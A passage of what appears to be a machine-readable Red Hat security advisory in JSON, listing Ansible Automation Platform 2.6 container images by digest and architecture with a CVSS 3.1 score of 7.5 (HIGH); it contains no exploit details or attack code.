"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
